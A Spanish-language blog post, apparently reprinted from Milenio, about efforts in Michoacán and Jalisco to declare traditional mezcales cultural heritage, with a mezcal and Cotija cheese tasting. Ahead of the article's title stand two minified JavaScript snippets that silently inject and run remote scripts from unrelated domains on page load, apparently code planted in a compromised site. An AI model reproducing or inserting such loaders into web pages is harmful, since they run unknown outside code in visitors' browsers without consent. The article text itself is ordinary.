;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 43. Mezcales tradicionales de Michoacán y Jalisco

43. Mezcales tradicionales de Michoacán y Jalisco


Del 29 de septiembre al 1º de octubre nos reunimos con maestros mezcalilleros, diputados, autoridades, servidores públicos y ciudadanos de los estados de Michoacán y Jalisco, con el objetivo de planear acciones concretas que garanticen la protección y salvaguarda de los mezcales tradicionales que se elaboran en ambos estados.
En el caso michoacano, se comentó la posibilidad de que, a partir de un punto de acuerdo del Congreso local, éste hiciese un exhorto al gobernador para que declare Patrimonio Cultural Intangible los mezcales tradicionales de Michoacán. Todo conforme a la Ley de desarrollo cultural para el estado de Michoacán de Ocampo que en su artículo 1 menciona como objeto, entre otros, “establecer las bases generales para garantizar el libre ejercicio del derecho a la cultura y de los derechos culturales de la población del Estado y de los michoacanos radicados fuera del territorio estatal.” La importancia de una declaratoria como ésta es que pone en manos de los ciudadanos la protección de su Patrimonio Cultural, pues permite que éstos busquen formas creativas y decididas de organizarse para su conservación.
Además de platicar, en Morelia conmemoramos el nacimiento del General Morelos con una saboreada de 5 mezcales procedentes de vinatas ubicadas en Etúcuaro, Queréndaro, Tzitzio, Morelia y Charo, acompañados de un exquisito y auténtico queso Cotija.
En Zapotitlán, Jalisco, continuamos tareas iniciadas en enero pasado (impreso.milenio.com/node/8703958) con los maestros taberneros, ahora con la importante presencia de la autoridad municipal. También aquí se buscará proteger los mezcales destilados como Patrimonio Cultural, y digo destilados porque en esta región acostumbran llamar mezcales a los magueyes vivos.
Y para saborear tres quesos Cotija de 2006, 2007 y 2008 con mezcales tradicionales de magueyes silvestres y cultivados, hay que ir a Red Fly hoy sábado a las 12 horas: Orizaba 145, colonia Roma, DF. Cuota de recuperación: 200 pesos. Habrá venta de quesos.
http://impreso.milenio.com/node/8841666

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *